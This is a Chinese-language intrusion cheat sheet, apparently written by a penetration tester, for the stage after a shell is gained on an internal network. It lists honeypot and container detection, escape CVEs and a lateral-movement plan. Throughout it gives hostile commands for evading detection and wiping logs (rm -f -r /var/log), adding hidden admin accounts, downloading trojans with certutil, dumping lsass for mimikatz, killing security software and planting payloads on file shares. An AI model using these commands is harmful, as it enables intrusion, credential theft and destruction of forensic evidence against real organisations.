拿到shell进入内网后虽然ms17010横行但也是不能拿着扫描器到处扫的,每一步都应该小心谨慎,基本原则就是不要被扣分 所以首先在下认为应该判断是否为虚拟机,docker,蜜獾等
docker通常会有一些命令not find例如ifconfig uname-a 等 如果打着四面漏风的系统多半就是蜜獾了,而且里面没有正经的办公痕迹的也很可疑 可以用如下方式识别一些简单蜜獾 1. BOF的识别;BOF(Back Officer Friendly) 2. 假代理技术,关注Honeypot Hunter软件; 3. Honeyd的识别; 4. 利用Sebek识别蜜网,第二、三代蜜网都有这个软件; 5. Tarpits的识别; 6. 外联数据控制识别,一般蜜罐会严格限制系统向外的流量; 7. 识别VMware虚拟机,重点关注MAC地址的范围 8. 用Nmap等Scan工具,同一个机器同时开放很多Port的。 9. 因为很多蜜罐都设置在相同或临近的网段。所以,同一个网段(e.g. /24),很多机器都开放相同的Port,回应相似的Response。 10. 去Shodan/Censys查 vm虚拟机为运行xchg ecx,eax 时间大于0xFF时可以确定,上传检测小脚本测试 //使用如下命令判断docker ls -alh ./dockerenv cat /proc/1/cgroup env \ PATH //检查是否有docker相关的环境变量 //ifconfig可以直接看到docker网卡,没有ifconfig时查看本机ip cat /etc/hosts //检测vm虚拟机 sudo dd if=/dev/mem bs=64k skip=12 count=1| string -n10 //会与物理机得到不一样的输出docker逃逸
//常用方法 emote api 未授权访问//2357端口 docker.sock挂载到容器内部 特权模式docker run --privileged runc(CVE-2019-5736) Dirty Cow(CVE-2016-5195)vm逃逸
1、UAF漏洞,控制RIP; 2、out-of-bound read 漏洞。 3、out-of-bound write 漏洞。和第二个漏洞合力起到泄露关键信息的作用。 CVE-2015-5165(一个内存泄露漏洞) CVE-2015-7504(一个堆溢出漏洞) CVE-2017-4901 CVE-2020-4004/5 只能想想,还没poc开始收集一些系统信息 linux
set +0 history //关闭记录功能,结束后-o开启 pa aux //显示所有用户的进程,查看是什么防火墙 chkconfig --list //查看服务 systemctl status firewalld //查看防火墙状态 ifconfig -a //多半有域信息 history //查看敏感操作 for k in $( seq 1 255);do ping -c 1 192.168.99.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done //c段扫描 egrep expect /* -rl |grep “.sh” //递归查询包含expect字段的文件,查运维用的密码 find / -name "*.log" -exec rm -rvf {} \; //痕迹清理 rm -f -r /var/log //日志清理window
query user || qwinsta //先看下管理员在线没,挤下去了就很~嗯尴尬 echo %PROCESSOR_ARCHITECTURE% //系统体系结构 whoami && whoami /priv //当前用户权限 ipconfig /all //多半有域信息 tasklist //window显示进程 wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe //显示杀毒软件 taskkill //killwaf wmic service list brief //显示服务 TRACERT -d -h ip //出网如果1跳就多半没有流量监测与网络防护设备 systeminfo //拿着补丁可以区bugs.hacking8.com/tiquan/ 查exp net user 用户名 密码 /add //添加新用户,需要administrator权限 net localgroup administrators 用户名 /add //把用户提升为管理员权限,需要administrator权限 net user /dom //尽量别用net user /domain别问我怎么知道的 //持久控制 certutil -urlcache -split -f <url> <out_filename> //下载马到本地 lsass dump到本地再mimikatz抓取 for /l %i in (1,1,255) do @ping 192.168.64.%i -w 1 -n 1|find /i "ttl=" //c段扫描收集到系统信息可以开始判断当前系统是属于什么角色 文件服务器:配合社工,生成payload捆绑到文件服务器公用文件上,可批量上线主机 DNS服务器:端口53,可通过DNS服务器获取内网web系统信息,或者探测域信息 DHCP服务器:查看内网多组网段信息,更多的获取拓补信息 开发测试服务器:获取源码,新的信息资产,多存在弱口令 代理服务器:获取服务器账号,拿到各种密码 web服务器:可能需要提权 个人PC:查看是否存在域环境
我的内网渗透思路 1.先隐蔽的收集信息 2.列出环境中所有waf,杀软等 3.找出系统的主要工作项目,制定可能有关联的移动方向与鱼叉思路,理清内网拓扑图,网段. 4依次绕过或者暂时关闭waf,进行端口转发,扫描内网,路由,交换机,端口等判断是域还是组。 5.组的话,用常见 web 方法。 6.域的话 gpp,kerberos,黄金白银票据,抓密码, 7.pth,ptk,spn 扫描,ipc,445,web 漏洞,各种未授权,密码相同等. 8.进行端口转发,连接msf,进一步ms17010等,ms14-068移动到域控 9.白银黄金进行持久控制 10.dns,域前置隐蔽c2 11.claerv和删除路由表,web日志,系统登录日志,安全日志
